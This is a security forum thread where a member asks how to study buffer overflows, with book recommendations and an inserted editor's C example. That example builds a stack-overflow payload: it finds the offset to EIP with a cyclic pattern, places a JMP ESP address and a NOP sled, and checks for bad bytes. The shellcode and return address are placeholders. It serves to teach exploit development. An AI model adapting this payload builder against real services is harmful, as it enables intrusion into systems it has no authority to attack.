Thread: Buffer Overflow Guidance

#1 l1nuxant_ee (Member; Join Date: Jun 2006; Posts: 107)

Buffer Overflow Guidance

Hello all,

I am planning to concentrate on studying BOF. I have read some tutorials and was able to recreate attacks using BOF. However, I would like a deeper understanding of processor registers (EIP, ESP, EBP, ...), and also to know the difference between exit methods (SEH, thread, ...).

So, experts here, what would you advise me to read, or where should I begin?
Your contribution is highly appreciated.

Thanks in advance,

#2 ShadowKill (Senior Member; Join Date: Dec 2007; Posts: 908)

Quote Originally Posted by l1nuxant_ee (post #1)
I'd be glad to give you some in-depth information (first-hand experience, basic methodology, etc.) here if you'd like. Can you provide some specific areas that you'd like to focus on? I know you said registers, pointers, and exit calls, but really that's a pretty small part of the whole shellcode/scripting/BOF field. Are you familiar with the variations of heap/stack/etc. attacks and the intricacies of memory addressing, at least as far as locating the applicable address(es), building the "appropriate" sized NOP sled, and delivery methods? Also, are you more interested in, say, Perl-structured attacks, C++, etc.?

    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

#3 l1nuxant_ee (Member; Join Date: Jun 2006; Posts: 107)

Quote Originally Posted by ShadowKill (post #2)
Thanks a lot, ShadowKill, for this response.

I have recreated the BOF on the Ability FTP server. I understood how it worked, how to get the JMP ESP address, where to put my shellcode, and how to use the NOPs to fill the gaps. But when I tried to recreate a BOF for other applications (such as WinGate, Savant) I encountered difficulties (as the exploit needed certain bytes at the beginning of my evil packet), so I thought of focusing on the registers, as I don't know the purpose of ESP and EBP until now.

I have read about the heap/stack attacks (from Wikipedia) and somehow understood the difference between them.

I have been able to use both Python and Perl attacks, and I think I won't have a problem with using C++.

Overall, I find myself at the start of this field, and I really found myself loving it, so this is why I would like to get into it.

Thanks a lot again,
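A worked example of the two steps described in post #3, finding the offset at which the return address (EIP) is overwritten and then laying out the packet as [prefix][junk][JMP ESP address][NOP sled][shellcode], added here as an editor's illustration. It is not code from the thread, from the Ability FTP exploit, or from any published exploit. The JMP ESP address 0x7c9d30d7, the "USER " command prefix (standing in for the "certain bytes at the beginning" mentioned above), the 16-byte sled, and the four INT3 bytes used in place of real shellcode are all assumed placeholders; against a real target the address comes from a debugger and the prefix from the protocol.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Cyclic pattern "Aa0Aa1Aa2...Zz9": every 4-byte window is unique, so the
 * 4 bytes that land in EIP after a crash tell you where in the buffer the
 * saved return address sits. Writes at most n bytes, returns bytes written. */
size_t pattern_create(unsigned char *out, size_t n) {
    size_t i = 0;
    for (int u = 'A'; u <= 'Z' && i < n; u++)
        for (int l = 'a'; l <= 'z' && i < n; l++)
            for (int d = '0'; d <= '9' && i < n; d++) {
                if (i < n) out[i++] = (unsigned char)u;
                if (i < n) out[i++] = (unsigned char)l;
                if (i < n) out[i++] = (unsigned char)d;
            }
    return i;
}

/* Map the EIP value shown by the debugger back to an offset in a pattern of
 * pattern_len bytes, or -1 if not found. x86 is little-endian, so
 * EIP = 0x41326341 means the bytes "Ac2A" were in memory at that spot. */
long pattern_offset(uint32_t eip, size_t pattern_len) {
    unsigned char needle[4] = { (unsigned char)(eip & 0xff),
                                (unsigned char)((eip >> 8) & 0xff),
                                (unsigned char)((eip >> 16) & 0xff),
                                (unsigned char)((eip >> 24) & 0xff) };
    unsigned char *pat = malloc(pattern_len);
    if (!pat) return -1;
    size_t len = pattern_create(pat, pattern_len);
    long found = -1;
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

/* Lay out [prefix][junk up to the return address][JMP ESP, little-endian]
 * [NOP sled][shellcode]. When the overwritten return address is popped by RET,
 * ESP points just past it, i.e. at the sled, so JMP ESP lands execution there.
 * Returns the payload length, or 0 if it does not fit in cap. */
size_t build_payload(unsigned char *out, size_t cap, const char *prefix,
                     size_t offset, uint32_t jmp_esp, size_t nops,
                     const unsigned char *sc, size_t sc_len) {
    size_t plen = strlen(prefix);
    size_t total = plen + offset + 4 + nops + sc_len;
    if (total > cap) return 0;
    unsigned char *p = out;
    memcpy(p, prefix, plen);                      p += plen;
    memset(p, 'A', offset);                       p += offset;
    *p++ = (unsigned char)(jmp_esp & 0xff);       *p++ = (unsigned char)((jmp_esp >> 8) & 0xff);
    *p++ = (unsigned char)((jmp_esp >> 16) & 0xff); *p++ = (unsigned char)((jmp_esp >> 24) & 0xff);
    memset(p, 0x90, nops);                        p += nops;
    memcpy(p, sc, sc_len);
    return total;
}

/* Sanity-check a built payload: the return address must sit exactly at
 * prefix_len + offset, contain none of the bytes the protocol would mangle
 * (NUL, LF, CR in the demo), and be followed by the NOP sled. */
int payload_layout_ok(const unsigned char *buf, size_t len, size_t prefix_len,
                      size_t offset, uint32_t jmp_esp,
                      const unsigned char *bad, size_t nbad) {
    if (len < prefix_len + offset + 5) return 0;
    const unsigned char *r = buf + prefix_len + offset;
    uint32_t got = (uint32_t)r[0] | ((uint32_t)r[1] << 8) |
                   ((uint32_t)r[2] << 16) | ((uint32_t)r[3] << 24);
    if (got != jmp_esp) return 0;
    for (size_t i = 0; i < 4; i++)
        for (size_t j = 0; j < nbad; j++)
            if (r[i] == bad[j]) return 0;
    return r[4] == 0x90;
}

/* Runs the constructed scenario end to end: the offset is recovered from a
 * constructed crash value (EIP = 0x41326341, i.e. "Ac2A", offset 66), then the
 * packet is built around the given JMP ESP address. Returns the payload
 * length if the layout checks out, else 0. */
size_t demo_payload_check(uint32_t jmp_esp) {
    long off = pattern_offset(0x41326341u, 1000);      /* constructed crash value */
    if (off < 0) return 0;
    unsigned char sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };   /* INT3s stand in for shellcode */
    unsigned char bad[] = { 0x00, 0x0a, 0x0d };
    unsigned char buf[512];
    /* "USER " is an assumed command prefix; the real one depends on the target */
    size_t n = build_payload(buf, sizeof buf, "USER ", (size_t)off, jmp_esp,
                             16, sc, sizeof sc);
    return payload_layout_ok(buf, n, 5, (size_t)off, jmp_esp, bad, 3) ? n : 0;
}

int main(void) {
    printf("offset to EIP: %ld\n", pattern_offset(0x41326341u, 1000));
    /* 0x7c9d30d7 is an assumed JMP ESP address, not one taken from any DLL */
    printf("payload length: %zu\n", demo_payload_check(0x7c9d30d7u));
    return 0;
}
```

The offset is counted from the first byte the target copies, not from the start of the socket write, which is why the prefix is kept separate from the junk. The bad-byte check is the reason some targets "need certain bytes" and reject others: a return address containing 0x00, 0x0a or 0x0d is cut short by a string or line parser before it ever reaches the stack, so it has to be rejected at build time and another JMP ESP chosen.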

#4 l1nuxant_ee (Member; Join Date: Jun 2006; Posts: 107)

Dears,

Does anyone know a good book related to this topic?

#5 pureh@te (Developer; Join Date: Mar 2007; Posts: 6,124)

Although the title sounds pretty gay, this book is an excellent read.

    http://www.amazon.com/Hacking-Art-Ex...1894923&sr=8-1

#6 ShadowKill (Senior Member; Join Date: Dec 2007; Posts: 908)

Quote Originally Posted by pureh@te (post #5)

Excellent book, PureH@te. I actually got my copy of the first edition signed at Defcon some years ago, DC12 I believe.

From what I've seen so far, I believe that the first edition of the same book would benefit you more than the second. It is more technical and goes further into the inner workings of BOFs and their application in various areas such as networking, wired and wireless, as well as others. The second edition is more for beginners and those interested in object-oriented programming methodologies. I will put up a tutorial, of sorts, on overflowing as well as basic assembly manipulation, etc. sometime soon.

#7 l1nuxant_ee (Member; Join Date: Jun 2006; Posts: 107)

Quote Originally Posted by ShadowKill (post #6)
Thanks, PureH@te, for the book; I will check it.

ShadowKill, I will be waiting for your tutorial, so please don't be late.

#8 Armagedeon (Junior Member; Join Date: Feb 2008; Posts: 86)

Help on BOF with Ability server

Hello, you guys,
I need some help please...

l1nuxant_ee, you said:
"I have recreated the BOF on ability ftp server"

I'm trying to do the same on an XP SP2 box, with no success...

Is this possible?

I don't even get to recreate the simple-fuzzer.py script...

I get no crash... what am I doing wrong?

Could you guys help?

Thanks in advance.

#9 ShadowKill (Senior Member; Join Date: Dec 2007; Posts: 908)

Quote Originally Posted by Armagedeon (post #8)
Armagedeon, please do not hijack other people's threads. Create your own thread, ask the question there, and others will respond. This thread is for the OP's question(s), not yours. Thanks.

#10 Armagedeon (Junior Member; Join Date: Feb 2008; Posts: 86)

Sorry,

I just posted it here because I thought it was within the scope of the subject...
I will take your advice into consideration.
Thanks
